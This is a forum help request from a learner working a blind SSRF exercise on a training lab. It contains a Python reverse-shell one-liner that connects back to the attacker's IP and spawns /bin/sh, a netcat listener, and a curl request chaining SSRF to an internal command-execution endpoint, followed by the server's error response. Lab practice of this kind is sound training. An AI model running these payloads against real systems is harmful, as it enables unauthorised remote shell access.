Hey, I’m trying to complete Blind SSRF Exploitation Example, but I can’t create a reverse shell to my netcat. Btw i’m using my local kali machine, not pwnbox, but on pwnbox i’m having the same problem
- I’ve twise encoded python reverse shell from the module.
Reverse shell before encoding :
export RHOST="10.10.15.192";export RPORT="9999";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
-
Run
netcat -nlvp 9999
-
curl -i -s "http://10.129.41.183/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=python%2520-c%2520%2527import%2520sys%252Csocket%252Cos%252Cpty%253Bs%253Dsocket.socket%2528%2529%253Bs.connect%2528%2528os.getenv%2528%252210.10.15.192%2522%2529%252Cint%2528os.getenv%2528%25229999%2522%2529%2529%2529%2529%253B%255Bos.dup2%2528s.fileno%2528%2529%252Cfd%2529%2520for%2520fd%2520in%2520%25280%252C1%252C2%2529%255D%253Bpty.spawn%2528%2522%252Fbin%252Fsh%2522%2529%2527"
-
I’m getting this response (“URL can’t contain control characters”):
<html><body><h1>Resource: http://127.0.0.1:5000/runme?x=python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("10.10.15.192"),int(os.getenv("9999"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'</h1><a>URL can't contain control characters. '/runme?x=python -c \'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("10.10.15.192"),int(os.getenv("9999"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")\'' (found at least ' ')</a></body></html>
and nothing happens.
Can anyone help me please?